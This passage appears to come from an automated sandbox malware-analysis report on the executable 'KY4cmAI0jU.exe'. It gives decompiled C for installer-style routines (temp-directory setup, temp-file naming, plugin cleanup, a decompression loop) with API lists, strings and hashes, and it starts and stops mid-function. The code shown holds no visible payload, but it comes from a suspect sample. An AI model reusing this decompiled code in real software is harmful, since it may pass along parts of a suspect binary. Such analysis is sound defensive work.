						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                        0x004015b3
                                                                                                        0x004015ba
                                                                                                        0x004015bd
                                                                                                        0x004015c2
                                                                                                        0x004015c6
                                                                                                        0x004015c8
                                                                                                        0x004015d0
                                                                                                        0x004015d6
                                                                                                        0x004015d8
                                                                                                        0x004015db
                                                                                                        0x004015e3
                                                                                                        0x004015f0
                                                                                                        0x004015fd
                                                                                                        0x004015fd
                                                                                                        0x004015f2
                                                                                                        0x004015f3
                                                                                                        0x004015fb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004015fb
                                                                                                        0x004015f0
                                                                                                        0x00401600
                                                                                                        0x00401603
                                                                                                        0x00401605
                                                                                                        0x00401606
                                                                                                        0x004015c8
                                                                                                        0x0040160d
                                                                                                        0x0040162d
                                                                                                        0x00402164
                                                                                                        0x0040160f
                                                                                                        0x00401611
                                                                                                        0x0040161c
                                                                                                        0x00401622
                                                                                                        0x00401622
                                                                                                        0x0040288e
                                                                                                        0x0040289a

                                                                                                        APIs
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,74B5F560), ref: 004056FB
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                        • API String ID: 3751793516-501415292
                                                                                                        • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                        • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                        • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                        • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                        0x00405870
                                                                                                        0x00405876
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405878
                                                                                                        0x0040587f
                                                                                                        0x00405889
                                                                                                        0x00405896
                                                                                                        0x00405899
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00000000
                                                                                                        0x004058a7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CountFileNameTempTick
                                                                                                        • String ID: "C:\Users\user\Desktop\KY4cmAI0jU.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                        • API String ID: 1716503409-375939362
                                                                                                        • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                        • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                        • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                        • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 737516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E737516DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7375405c = _a8;
				 *0x73754060 = _a16;
				 *0x73754064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73754038, E73751556);
				_push(1); // executed
				_t37 = E73751A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E737522AF(_t54);
					}
					E737522F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E737524D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7375156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E737524D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E737524D8(_t54);
							_t37 = GlobalFree(E73751266(E73751559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7375249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E737514E2( *0x73754058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73752CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73752A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E737526B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                        0x737516db
                                                                                                        0x737516db
                                                                                                        0x737516db
                                                                                                        0x737516e5
                                                                                                        0x737516ed
                                                                                                        0x737516fa
                                                                                                        0x73751708
                                                                                                        0x7375170b
                                                                                                        0x7375170d
                                                                                                        0x73751712
                                                                                                        0x73751717
                                                                                                        0x73751836
                                                                                                        0x73751836
                                                                                                        0x7375171d
                                                                                                        0x73751721
                                                                                                        0x73751724
                                                                                                        0x73751729
                                                                                                        0x7375172b
                                                                                                        0x73751731
                                                                                                        0x73751737
                                                                                                        0x73751767
                                                                                                        0x7375176e
                                                                                                        0x73751792
                                                                                                        0x737517dd
                                                                                                        0x73751794
                                                                                                        0x73751794
                                                                                                        0x73751795
                                                                                                        0x7375179b
                                                                                                        0x7375179c
                                                                                                        0x737517a6
                                                                                                        0x737517a9
                                                                                                        0x737517ae
                                                                                                        0x737517b5
                                                                                                        0x737517b5
                                                                                                        0x737517bc
                                                                                                        0x737517c2
                                                                                                        0x737517c8
                                                                                                        0x737517d5
                                                                                                        0x737517d6
                                                                                                        0x737517d9
                                                                                                        0x73751770
                                                                                                        0x73751771
                                                                                                        0x73751786
                                                                                                        0x73751786
                                                                                                        0x737517e7
                                                                                                        0x737517ea
                                                                                                        0x737517f7
                                                                                                        0x737517fe
                                                                                                        0x73751806
                                                                                                        0x73751809
                                                                                                        0x73751809
                                                                                                        0x73751806
                                                                                                        0x73751816
                                                                                                        0x7375181e
                                                                                                        0x73751823
                                                                                                        0x73751816
                                                                                                        0x7375182b
                                                                                                        0x00000000
                                                                                                        0x7375182d
                                                                                                        0x00000000
                                                                                                        0x7375182e
                                                                                                        0x7375182b
                                                                                                        0x7375173b
                                                                                                        0x7375173e
                                                                                                        0x7375175c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7375175f
                                                                                                        0x73751764
                                                                                                        0x73751764
                                                                                                        0x73751766
                                                                                                        0x00000000
                                                                                                        0x73751766
                                                                                                        0x73751740
                                                                                                        0x73751741
                                                                                                        0x73751749
                                                                                                        0x7375174a
                                                                                                        0x00000000
                                                                                                        0x7375174a
                                                                                                        0x73751743
                                                                                                        0x73751744
                                                                                                        0x73751752
                                                                                                        0x00000000
                                                                                                        0x73751752
                                                                                                        0x73751747
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x73751747

                                                                                                        APIs
                                                                                                          • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D09
                                                                                                          • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D0E
                                                                                                          • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D13
                                                                                                        • GlobalFree.KERNEL32 ref: 73751786
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 73751809
                                                                                                        • GlobalFree.KERNEL32 ref: 7375182E
                                                                                                          • Part of subcall function 737522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 737522E0
                                                                                                          • Part of subcall function 737526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73751757,00000000), ref: 73752782
                                                                                                          • Part of subcall function 7375156B: wsprintfA.USER32 ref: 73751599
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.219980840.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.219965767.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220004085.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.220020460.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3962662361-3916222277
                                                                                                        • Opcode ID: 5d23d4b4bf5e5eeaf10b80309c931337f940b531b1f5a576d8108379fb7ffa5a
                                                                                                        • Instruction ID: 3e40639a074fc50ca78414ceded735e55ff0921bf2a9bc04de6c83572cd1c58e
                                                                                                        • Opcode Fuzzy Hash: 5d23d4b4bf5e5eeaf10b80309c931337f940b531b1f5a576d8108379fb7ffa5a
                                                                                                        • Instruction Fuzzy Hash: 5641737250034D9BDF0DAF688EC8B9537ECBF04226F188469F94B9B1C6DB789545CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                        0x00403209
                                                                                                        0x0040320f
                                                                                                        0x00403215
                                                                                                        0x0040321c
                                                                                                        0x00403221
                                                                                                        0x00403229
                                                                                                        0x00403235
                                                                                                        0x0040323b
                                                                                                        0x0040321f
                                                                                                        0x0040321f
                                                                                                        0x0040321f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\KY4cmAI0jU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.218416556.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.218411808.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218423137.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218427563.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218437653.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218442008.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.218447118.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 4115351271-1075807775
                                                                                                        • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                        • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                        • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                        • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 99%
                                                                                                        			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
